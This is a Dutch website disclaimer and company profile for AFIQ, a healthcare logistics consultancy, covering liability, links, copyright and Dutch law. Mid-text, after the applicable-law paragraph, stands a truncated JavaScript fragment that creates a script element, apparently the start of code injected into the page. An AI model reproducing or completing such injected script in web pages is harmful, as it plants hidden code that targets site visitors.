Disclaimer

Deze disclaimer is van toepassing op de website www.afiq.nl.

Door deze website te bezoeken en/of de op of via deze website aangeboden informatie te gebruiken, gaat u akkoord met de toepasselijkheid van deze disclaimer. Te allen tijde prevaleren de voorwaarden van specifieke producten en diensten besteld via deze website boven deze disclaimer.

 

Gebruik van de AFIQ-web site

Er kunnen geen rechten aan de informatie op deze website worden ontleend. Bovendien staat AFIQ niet in voor de juistheid, volledigheid en actualiteit van de op deze website geboden informatie, en garandeert zij evenmin dat de website foutloos of ononderbroken zal functioneren. Iedere aansprakelijkheid ten aanzien van de juistheid, volledigheid, actualiteit van de geboden informatie en het (ongestoord) gebruik van deze website wordt door AFIQ nadrukkelijk van de hand gewezen.

 

Informatie van derden, producten en diensten

Indien AFIQ links naar websites van derden weergeeft, betekent dit niet dat de op of via deze websites aangeboden producten of diensten door AFIQ wordt aanbevolen. AFIQ aanvaart geen aansprakelijkheid en geen enkele verantwoordelijkheid voor de inhoud, het gebruik of de beschikbaarheid van websites waarnaar wordt verwezen. De informatie op dergelijke websites is door AFIQ niet nader beoordeeld op juistheid, redelijkheid, actualiteit of volledigheid.

 

Informatie gebruiken

AFIQ behoudt zich alle intellectuele eigendomsrechten en andere rechten voor met betrekking tot alle op of via deze website aangeboden informatie (waaronder alle teksten, grafisch materiaal en logo’s). Het is niet toegestaan informatie op deze website te kopiëren, te downloaden of op enigerlei wijze openbaar te maken, te verspreiden of te verveelvoudigen zonder voorafgaande schriftelijke toestemming van AFIQ. U mag informatie op deze website wel afdrukken en/of downloaden voor eigen persoonlijk gebruik.

 

Wijzigingen

AFIQ behoudt zich het recht voor om de aangeboden informatie op deze website, met inbegrip van de tekst van deze disclaimer, te allen tijde te wijzigen zonder hiervan nadere aankondiging te doen. Het verdient aanbeveling periodiek na te gaan of de op of via deze website aangeboden informatie, met inbegrip van de tekst van deze disclaimer, is gewijzigd.

 

Toepasselijk recht

Op deze website en de disclaimer is het Nederlands recht van toepassing. Alle geschillen uit hoofde van of in verband met deze disclaimer zullen bij uitsluiting worden voorgelegd aan de bevoegde rechter in Nederland.var d=document;var s=d.createElement(‘script’);

Contact

+31 (0) 6 43277758

info@afiq.nl

Meikers 25, 7623 LB, Borne

Adviesbureau gezondheidszorg

AFIQ, opgericht in 2012, is een organisatie adviesbureau die haar diensten levert binnen de Gezondheidszorg. Op het gebied van logistiek met expertise in Integraal Capaciteitsmanagement (o.a. Tactisch Plannen), Business analyse, management informatie en procesoptimalisatie door middel van Lean Six Sigma (Black Belt).

AFIQ heeft daarbij als bedrijfsmotto ‘Betrokkenheid en advies op maat’. Samen met de klant maken wij duidelijke afspraken die bijdragen om de afgesproken doelen te bewerkstelligen.

De diensten van AFIQ spelen zich zowel op het gebied van advies als op interim-management af.
Mocht u geïnteresseerd zijn in of vragen hebben over wat AFIQ voor u kan betekenen, neem dan gerust contact met ons op.